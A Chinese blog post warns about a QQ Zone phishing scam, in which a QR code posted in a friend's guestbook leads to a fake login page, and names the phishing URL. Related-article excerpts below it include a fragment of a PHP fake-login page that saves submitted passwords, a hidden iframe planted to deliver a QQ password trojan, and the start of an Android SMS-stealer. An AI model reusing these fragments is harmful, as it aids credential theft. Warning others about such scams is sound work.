一个QQ空间的钓鱼盗号过程揭露,大家谨防上当

最新推荐文章于 2025-06-05 09:29:43 发布
原创 最新推荐文章于 2025-06-05 09:29:43 发布 · 1.5w 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#钓鱼 #安全 #信息安全

博客介绍了QQ空间钓鱼盗号过程,用户因好奇点击好友留言中的二维码,进入非腾讯域名的虚假QQ空间登录页,随便填账号密码登录会跳转。还指出该盗号手法利用人性弱点,腾讯对QQ空间链接处理不佳,账号被盗会引发更多用户被盗。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.盗号过程

很久没有用过QQ空间了,今天突然QQ弹出一条消息,说我的一个好友留言中提到了我,但是我却也打不开这个链接。
留言提示
于是,我就去她的空间留言板查看。发现第一条留言,是一个二维码
二维码
扫描之后,进入到一个网页,是标准的QQ空间登录页。
登录页面
这么敏感的信息,当然要慎之又慎!我们识别一下这个二维码,发现!他并不是腾讯的域名。如下

http://gallatinboom.com/catfish/xxyy.html

我们随便填入qq账号和密码,点击登录,跳转到一张狗头
跳转

2.危害

首先,这个盗号手法正是利用了人性好奇的弱点,同时,在QQ空间中,登录QQ空间人们的猝不及防。
也说明了在QQ空间中的链接腾讯并没有很好地做处理,非官方页面没有必要的提醒。
整个链条的开始,当一个用户的账号被盗取,将会裂变般的让更多的用户被盗。

钓鱼盗号怎么防
mengjie133233的专栏
12-30 516
花生你好: 最近你的姐姐微信号被盗了,然后群发了学校要收500块活动费的文字微信,好多亲戚朋友都收到了,爸爸也收到了,目前知道的是你姐姐的妈妈被骗了500,是否有其他亲戚上钩还没有具体的数据统计。在这里爸爸想举个通俗易懂的例子来讲解一下你姐姐账号被盗的流程。 首先,微信登录实际上是强推荐使用手机号+本机验证码发起登录的,看似没有任何漏洞,但是实际上可以通过钓鱼方式来实现登录。什么叫钓鱼盗号呢?我试着举个简单例子说明。 钓鱼账号被盗可能是这样的 有一天,你姐姐在玩手机,在手机的一个新下载的游戏app里
某盗qq号链接分析
qq_44314361的博客
06-06 9246
今天无意间在qq群里发现有人发了一个链接,它长这个样子 想来是某个倒霉蛋又中招了,不得不说,最近的这种链接越来越猖狂了,于是本着好奇的心态我就分析了一波 打开链接 淦!一看就是老套路了,用官方的链接像这种腾讯文档类似的,里边加一个文件啦,提示什么文件损毁,需要下载什么什么软件修复了,还有这种,给一个模糊图片,说让去其他链接下载高清大图。ojbk打开它给的链接,安全起见,先把本地qq退了,浏览器cookies清除了,打开链接 哦吼,还挺会玩,不让在电脑打开,挺逼真哈,不过没关系,f12进入开发者模式,改
PHP实现简单的仿QQ空间登录界面钓鱼(仅供参考测试不可用于非法用途)
01-08
声明:此代码仅供参考不可用于非法用途,非法使用造成的后果自负 演示:界面 点击提交后账号和密码会被写入txt文本中,同时页面跳转 <?php if (isset($_POST[user])) { if (isset($_POST[pass])) { $myfile = fopen(abc.txt, a)/*abc.txt用于接收提交数据*/ or die(Unable to open file!); $txt = ━━━━账号=.$_POST[user]. 密码=.$_POST[pass];//$_POST[user]这个变量的意思,在所有post
一个被加入下载QQ盗号木马Trojan.PSW.QQPass.rie代码的网站
Purpleendurer@优快云
01-30 5404
endurer 原创2007-01-30 第1版该网站首页被加入代码:/-------<IFRAME src="hxxp://***.v**1*8***0.net/qq/" frameBorder=0 width=0 height=0></IFRAME>-------/打开该URL,没有显示内容,但网页中的VBScript代码会利用 Microsoft.XMLHTTP 和 scrīpt
还在傻傻设密码?黑客教你九招“盗”走你的网络账号!
最新发布
Python84310366的博客
06-05 920
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。密码破解界最原始、最粗暴的方式,就是“暴力破解”,也叫“密码穷举”。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。
黑产科普—最近大规模的QQ空间钓鱼攻击
blrk
03-25 1833
http://www.freebuf.com/articles/web/7951.html
差点被一个截图忽悠了,分析一个QQ空间钓鱼网站
BUG制造者:图图 <p>这是一个P标签</p>
06-05 7096
刚刚打开手机tim看到QQ空间有留言下面一个截图的东西(别扫进去输自己的账号密码哈,看看就得了,典型的钓鱼网站) 貌似在前几年就有此类网站,不过现在高级了些,下面就由图图来分析一下原理是什么鬼(毫无技术含量)大神快点绕道!!! 首先看到这个图片而写是熟人给你留言的,并且还是以好友备注的名字进行留言“XXX,我们合影的照片都在这里了 你太好笑了 照片呆呆的,长摁识别”会有这么一句话,好奇心强的都会点进去看~ 【为什么要搞这种二维码呢? 就是为了不让一些在线解码的网站轻易识别 反而只有QQ、微信可...
如何识别仿冒QQ空间盗号网站!.docx
09-27
首先,识别仿冒QQ空间盗号网站的关键在于正确辨识网址。官方的QQ空间网址是`qzone.qq.com`,这是一个固定且唯一的地址。仿冒网站的网址则可能五花八门,它们可能会模仿官方网址,但通常会有一些微妙的差别,比如额外...
qq登陆器(让你轻松登陆多个QQ,并且避免被盗号
12-16
5. `readme.txt`文件通常是一个简短的使用提示或者版本信息,帮助用户了解软件的基本信息和更新内容。 总的来说,QQ登陆器通过提供安全的多账号登录环境和便捷的操作体验,成为了许多用户日常管理和使用QQ账号的...
酷狗存储XSS之QQ空间钓鱼页面分析
Tesi1a的充电桩
01-03 1377
0x00 背景 同学遇到的一个QQ空间盗号的链接,说让我帮忙抓包分析下: 结论:分析后发现实际上是酷狗的网页存在存储型XSS漏洞,且被用来做钓鱼攻击了。 0x01攻击流程 下面通过复现流程来看看我们的账号是怎么被盗的吧。 0.好友发过来的链接: 原始链接为:https://kuwosing.kuwo.cn/ksingnew/match/matchworks.htm?wid=284672...
qq号盗软件下载手机版_盗号q神器手机版下载无需密码_盗号盗号q神黑客软件下载_详细白帽子指南
2401_84915584的博客
07-01 1万+
qq盗号木马(如何防范和应对?)二维码扫描登陆 *** 如今的 *** 登陆界面新增了二维码登陆,如果您在网吧上网,在无法确定 *** 安全环境下,采用二维码扫描登陆
QQ空间高仿源码
12-10
QQ空间高仿源码
QQ号的现在越来越牛B了,我差点被骗!大家要小心了
路人甲的专栏
03-14 5658
 今天晚上正在上网的我QQ突然弹出邮件消息收到一封邮件,点看一看说我的QQ近期被人恶意传播垃圾信息,导致我的QQ限制登陆,当时还很纳闷我没有发过什么垃圾信息,感觉这是个骗人的,于是看了下发件人写的是service但是邮件地址是空的,因为QQ官方发邮件时名字是service我当时还半信半疑,又看到底下有个连接地址是aq.qq.com 如图:看到图片上这个域名后我还在想这个到底是不
qq盗号的小插件 各位同胞注意别被骗了
JINGYI233的博客
12-02 5444
在src目录下写: package com.heima.qq; import android.os.Bundle; import android.app.Activity; import android.telephony.SmsManager; import android.text.TextUtils; import android.view.Menu; impo
盗号工具手机版下载/手机版盗号工具下载网站-详细信息安全教学
2401_84915584的博客
06-26 4142
用360浏览器进入盗版网页会被盗吗?最近发生了多起dnf至尊宝被盗事件。以下是边肖为您带来的,并利用BUGhacking原理进行分析,我在进入账号的网站填了我的小号
解决方法-破解密码QQ网站-详细黑客自学
程序员三九的博客
07-07 2532
防止 QQ 密码被盗的三个绝招第一招:复制粘贴防木马,注意,现在的新版本不支持“ Ctrl+V ”密码粘贴了。每次登录 QQ 前,新建一个文本文件,并键入密码后复制
可恶的QQ钓鱼网站
nwpulei
10-16 1万+
此处省略N字,总之,我的朋友竟然在QQ钓鱼网站上输入了账号和密码。对他进行安全教育后觉得对钓鱼网站也的做点什么。 钓鱼网站如图 仅有账号和密码,那我就多提交点用户名密码上去吧。 表单挺简单的 用这个代码提交数据 # -*- coding: utf-8 -*- import urllib import urllib2 from urllib2 impor
一个QQ用户名/密码钓鱼分析
热门推荐
heySister
06-11 1万+
写在前面 之前好像一直都没有碰到过钓鱼页面啥的…前天刚好碰到,就简单分析一下。 钓鱼分析 钓鱼网址藏在一个二维码中,正值毕业季啊,二维码图片上写着“青春不散场”…看着就很像真的… 二维码对应的URL为https://sharechain.qq.com/1b4e56f042d5bf060fe0e44d6346eebf,是一个腾讯微云的链接。没有用过腾讯微云,感觉像是分享一个帖子,然后帖子点进去就是下...
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ucsheep

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值